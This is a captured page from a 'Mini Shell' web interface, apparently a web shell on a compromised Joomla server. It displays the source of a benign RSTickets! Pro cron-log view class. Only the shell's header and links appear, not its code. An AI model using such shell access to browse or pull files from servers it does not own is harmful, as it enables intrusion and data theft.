Spade
Mini Shell
| Directory:~$ /home/lmsyaran/www/administrator/components/com_rsticketspro/views/cronlog/ |
| [Home] [System Details] [Kill Me] |
<?php
/**
* @version 2.0.0
* @package RSTickets! Pro 2.0.0
* @copyright (C) 2010 www.rsjoomla.com
* @license GPL, http://www.gnu.org/licenses/gpl-2.0.html
*/
defined('_JEXEC') or die('Restricted access');
class RsticketsproViewCronlog extends JViewLegacy
{
protected $items;
protected $pagination;
protected $state;
public function display($tpl = null)
{
$this->addToolbar();
$this->items = $this->get('Items');
$this->pagination = $this->get('Pagination');
$this->state = $this->get('State');
$this->filterForm = $this->get('FilterForm');
$this->activeFilters = $this->get('ActiveFilters');
$this->dateFormat =
RSTicketsProHelper::getConfig('date_format');
parent::display($tpl);
}
protected function addToolbar()
{
// set title
JToolbarHelper::title('RSTickets! Pro',
'rsticketspro');
RSTicketsProToolbarHelper::addToolbar('cronlog');
JToolbarHelper::deleteList('RST_CONFIRM_DELETE',
'cronlog.delete');
JToolbarHelper::custom('cronlog.deleteAll', 'cancel',
'cancel', 'RST_DELETE_ALL', false);
}
protected function showDate($date)
{
return JHtml::_('date', $date, $this->dateFormat);
}
}